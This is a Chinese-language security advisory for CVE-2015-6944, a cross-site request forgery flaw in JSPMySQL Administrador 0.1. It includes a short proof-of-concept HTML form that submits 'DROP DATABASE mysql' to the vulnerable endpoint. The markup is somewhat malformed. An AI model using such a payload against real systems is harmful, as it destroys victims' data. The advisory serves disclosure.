JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE

JSP/MySQL Administrador Web跨站请求伪造漏洞(CVE-2015-6944)


发布日期:2015-09-15
更新日期:2015-09-16

受影响系统:

JSPMySQL Administrador JSPMySQL Administrador 0.1

描述:

CVE(CAN) ID: CVE-2015-6944

JSPMySQL Administrador是JSP技术Web服务器上MySQL数据库的远程管理工具。

JSP/MySQL Administrador Web 1在实现上存在跨站请求伪造漏洞,远程攻击者通过sys/sys/listaBD2.jsp的cmd参数,利用此漏洞可劫持用户的身份验证请求。

<*来源:hyp3rlinx
 
  链接:
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

hyp3rlinx ()提供了如下测试方法:

<!DOCTYPE>
< html>
< head>
< title>JSP-MYSQL-ADMIN-CSRF</title>

< body>

< script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}

< !-- CSRF DROP MYSQL DATABASE -->

< form action="http://localhost:8081/sys/sys/listaBD2.jsp" method="post">
< input type="text" value="DROP DATABASE mysql"/>
< input type="text" value="Enviar" />
< input type="text" value="mysql" />
< /form>

建议:

厂商补丁:

JSPMySQL Administrador
----------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

https://sites.google.com/site/mfpledon/producao-de-software

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/ea99cb79f37e48fa5da3f9bc3d46c7fd.html